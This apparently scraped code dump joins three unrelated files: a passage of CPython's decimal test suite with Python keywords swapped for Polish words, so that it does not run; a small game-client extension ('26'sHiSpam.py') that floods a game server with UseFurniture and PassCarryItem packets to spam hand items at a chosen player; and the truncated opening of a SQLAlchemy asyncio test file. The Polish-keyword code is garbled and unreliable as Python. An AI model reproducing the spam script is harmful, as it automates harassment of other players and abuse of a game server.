self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
dla attr w ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
jeżeli C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
jeżeli C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
dla attr w ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
jeżeli HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'przy localcontext("xyz"): dalej',
locals())
self.assertRaises(TypeError, exec,
'przy localcontext(context=getcontext()): dalej',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
dla attr w ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
jeżeli HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
dla attr w ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are dla code coverage w _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters oraz setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
jeżeli C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 jeżeli C.MAX_PREC > 425000000 inaczej 2**31-1
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
przy localcontext() jako c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = Prawda
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
przy localcontext() jako c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = Prawda
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = Prawda
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertPrawda(c.flags[DivisionByZero])
c.traps[InvalidOperation] = Prawda
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
dla attr w ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=Nic)
dla attr w ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=Nic)
self.assertRaises(TypeError, x.to_integral, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], context=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=Nic)
self.assertRaises(TypeError, c.power, "x", 2, mod=Nic)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
dla sig w signal_dict:
jeżeli sig == signal:
self.assertPrawda(signal_dict[sig])
inaczej:
self.assertNieprawda(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertPrawda(Overflow w c.traps)
c.clear_traps()
dla k w c.traps.keys():
c.traps[k] = Prawda
dla v w c.traps.values():
self.assertPrawda(v)
c.clear_traps()
dla k, v w c.traps.items():
self.assertNieprawda(v)
self.assertNieprawda(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), Nic)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertPrawda(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertPrawda(c.traps[InvalidOperation])
# Set flags/traps z dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = Prawda
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = Prawda
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
dla r w range(lim):
dla t w range(lim):
dla round w RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
dla x w flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
dla x w traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
dla cond w IntCond:
c._flags = cond
self.assertPrawda(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
dla cond w IntCond:
c._traps = cond
self.assertPrawda(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
spróbuj:
z locale zaimportuj CHAR_MAX
wyjąwszy ImportError:
self.skipTest('locale.CHAR_MAX nie available')
def make_grouping(lst):
zwróć ''.join([chr(x) dla x w lst])
def get_fmt(x, override=Nic, fmt='n'):
zwróć Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
jeżeli CHAR_MAX == 127: # negative grouping w override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
c.traps[Overflow] = Prawda
c.traps[Underflow] = Prawda
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
jeżeli HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
inaczej:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
klasa SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
dla attr w dir(P):
jeżeli attr.startswith('_'):
kontynuuj
p_func = getattr(P, attr)
c_func = getattr(C, attr)
jeżeli (attr == 'Decimal' albo attr == 'Context' albo
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x dla x w p_sig.parameters.keys() jeżeli nie
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch w %s" % p_func)
c_kind = [x.kind dla x w c_sig.parameters.values()]
p_kind = [x[1].kind dla x w p_sig.parameters.items() jeżeli nie
x[0].startswith('_')]
# parameters:
jeżeli attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch w %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
dla name, param w sig.parameters.items():
jeżeli name == 'self': kontynuuj
jeżeli param.kind == POS:
args.append(pdict[module][name])
albo_inaczej param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
inaczej:
podnieś TestFailed("unexpected parameter kind")
zwróć args, kwargs
def tr(s):
"""The C Context docstrings use 'x' w order to prevent confusion
przy the article 'a' w the descriptions."""
jeżeli s == 'x': zwróć 'a'
jeżeli s == 'y': zwróć 'b'
jeżeli s == 'z': zwróć 'c'
zwróć s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
dla attr w dir(p_type):
jeżeli attr.startswith('_'):
kontynuuj
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
jeżeli inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) dla x w c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch w %s" % p_func)
p_kind = [x.kind dla x w p_sig.parameters.values()]
c_kind = [x.kind dla x w c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
jeżeli ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch w %s" % p_func)
inaczej: # Context methods are positional only w the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch w %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
spróbuj:
getattr(c_type(9), attr)(*args, **kwds)
wyjąwszy Exception jako err:
podnieś TestFailed("invalid signature dla %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
spróbuj:
getattr(p_type(9), attr)(*args, **kwds)
wyjąwszy Exception jako err:
podnieś TestFailed("invalid signature dla %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests jeżeli _decimal.so jest nie present.
jeżeli nie C:
all_tests = all_tests[1::2]
inaczej:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=Nic, verbose=Nic, todo_tests=Nic, debug=Nic):
""" Execute the tests.
Runs all arithmetic tests jeżeli arith jest Prawda albo jeżeli the "decimal" resource
jest enabled w regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith jeżeli arith jest nie Nic inaczej is_resource_enabled('decimal')
DEBUG = debug
jeżeli todo_tests jest Nic:
test_classes = all_tests
inaczej:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition dla each file w the test
# directory oraz add the definitions to the DecimalTest class. This
# procedure insures that new files do nie get skipped.
dla filename w os.listdir(directory):
jeżeli '.decTest' nie w filename albo filename.startswith("."):
kontynuuj
head, tail = filename.split('.')
jeżeli todo_tests jest nie Nic oraz head nie w todo_tests:
kontynuuj
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
usuń filename, head, tail, tester
spróbuj:
run_unittest(*test_classes)
jeżeli todo_tests jest Nic:
z doctest zaimportuj IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
jeżeli C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
w_końcu:
jeżeli C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
jeżeli nie C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
jeżeli nie orig_sys_decimal jest sys.modules['decimal']:
podnieś TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
jeżeli __name__ == '__main__':
zaimportuj optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number oraz context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
jeżeli opt.skip:
test_main(arith=Nieprawda, verbose=Prawda)
albo_inaczej args:
test_main(arith=Prawda, verbose=Prawda, todo_tests=args, debug=opt.debug)
inaczej:
test_main(arith=Prawda, verbose=Prawda)
|
26'sHiSpam.py | import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26'sHiSpam",
"description": "hic: on&off&cho&pla ",
"version": "0.2",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "UseFurniture"
KASAR = "PassCarryItem"
kod = ""
kod2 = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod, sec_player
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}{i:0}')
sleep(0.1)
ext.send_to_server('{out:'+str(KASAR)+'}{i:'+str(kod2)+'}')
sleep(0.1)
text = msj.packet.read_string()
if text == ':his cho':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Choose the furni from which you will buy the hand material"}{i:0}{i:30}{i:0}{i:0}')
if text == ':his pla':
msj.is_blocked = True
sec_player = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Give handitem to the person you are spamming"}{i:0}{i:30}{i:0}{i:0}')
if text == ':his on':
msj.is_blocked = True
sc = True
thread = threading.Thread(target=main)
thread.start()
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: on "}{i:0}{i:30}{i:0}{i:0}')
if text == ':his off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
mobi_id, _, _ = p.packet.read("iii")
kod = str(mobi_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_kod = False
def yukle_kod2(p):
global kod2, sec_player
if sec_player:
player_id, _, _ = p.packet.read("iii")
kod2 = str(player_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_player = False
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'UseFurniture')
ext.intercept(Direction.TO_SERVER, yukle_kod2, 'PassCarryItem')
|
test_concurrency_py3k.py | import threading
from sqlalchemy import exc
from sqlalchemy import testing
from sqlalchemy.testing import async_test
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_true
from sqlalchemy.util import asyncio
from sqlalchemy.util import await_fallback
from sqlalchemy.util import await_only
from sqlalchemy.util import greenlet_spawn
from sqlalchemy.util import queue
try:
from greenlet import greenlet
except ImportError:
greenlet = None
async def run1():
return 1
async def run2():
return 2
def go(*fns):
return sum(await_only(fn()) for fn in fns)
class TestAsyncioCompat(fixtures.TestBase):
    """Tests for the greenlet_spawn / await_only / await_fallback bridge
    between sync-style code and asyncio coroutines."""

    @async_test
    async def test_ok(self):
        # go() awaits run1 and run2 inside the greenlet: 1 + 2 == 3.
        eq_(await greenlet_spawn(go, run1, run2), 3)

    @async_test
    async def test_async_error(self):
        async def err():
            raise ValueError("an error")

        # An exception raised inside an awaited coroutine propagates
        # back out through greenlet_spawn.
        with expect_raises_message(ValueError, "an error"):
            await greenlet_spawn(go, run1, err)

    @async_test
    async def test_sync_error(self):
        def go():
            await_only(run1())
            raise ValueError("sync error")

        # An exception raised in the sync function (after a successful
        # await_only) propagates as well.
        with expect_raises_message(ValueError, "sync error"):
            await greenlet_spawn(go)

    def test_await_fallback_no_greenlet(self):
        # Outside any greenlet context, await_fallback runs the
        # coroutine itself instead of raising.
        to_await = run1()
        await_fallback(to_await)

    @async_test
    async def test_await_only_no_greenlet(self):
        to_await = run1()
        # await_only without a greenlet_spawn context must raise.
        with expect_raises_message(
            exc.MissingGreenlet,
            r"greenlet_spawn has not been called; can't call await_\(\) here.",
        ):
            await_only(to_await)

        # ensure no warning
        await greenlet_spawn(await_fallback, to_await)

    @async_test
    async def test_await_fallback_error(self):
        to_await = run1()
        await to_await

        async def inner_await():
            nonlocal to_await
            to_await = run1()
            await_fallback(to_await)

        def go():
            await_fallback(inner_await())

        # await_fallback inside a greenlet, while an event loop is already
        # running in the calling thread, must raise MissingGreenlet.
        with expect_raises_message(
            exc.MissingGreenlet,
            "greenlet_spawn has not been called and asyncio event loop",
